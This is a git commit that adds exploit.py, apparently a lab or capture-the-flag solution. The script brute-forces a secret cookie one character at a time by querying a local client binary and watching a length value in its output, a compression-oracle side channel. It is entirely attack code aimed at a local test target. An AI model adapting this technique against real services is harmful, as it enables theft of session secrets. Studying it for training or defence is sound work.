Add exploit script

2 years ago · aeb228882f
parent 145c5e1a86
commit aeb228882f
1 changed files with 29 additions and 0 deletions
--- a/exploit.py
+++ b/exploit.py
@ -0,0 +1,29 @@
+from string import ascii_lowercase, ascii_uppercase, digits
+from subprocess import check_output
+
+alphabet = ascii_lowercase + ascii_uppercase + digits
+env = {
+    "LD_PRELOAD": "..."
+}
+
+def request(url: str) -> int:
+    """Executes the client binary with the following URL, and checks its output."""
+    out = check_output(["./client", "127.0.0.1", "8080", url], env=env).decode('utf-8')
+    return int(out.split(' ')[1])
+
+
+if __name__ == '__main__':
+    cookie = ''
+    best_len = request('flag=' + cookie)
+
+    while True:
+        for c in alphabet:
+            current = request('flag=' + cookie + c)
+            if current <= best_len:
+                cookie += c
+                best_len = current
+                print(f'Found one byte in cookie: {cookie}')
+                break
+        else:
+            print(f'Found complete cookie: {cookie}')
+            break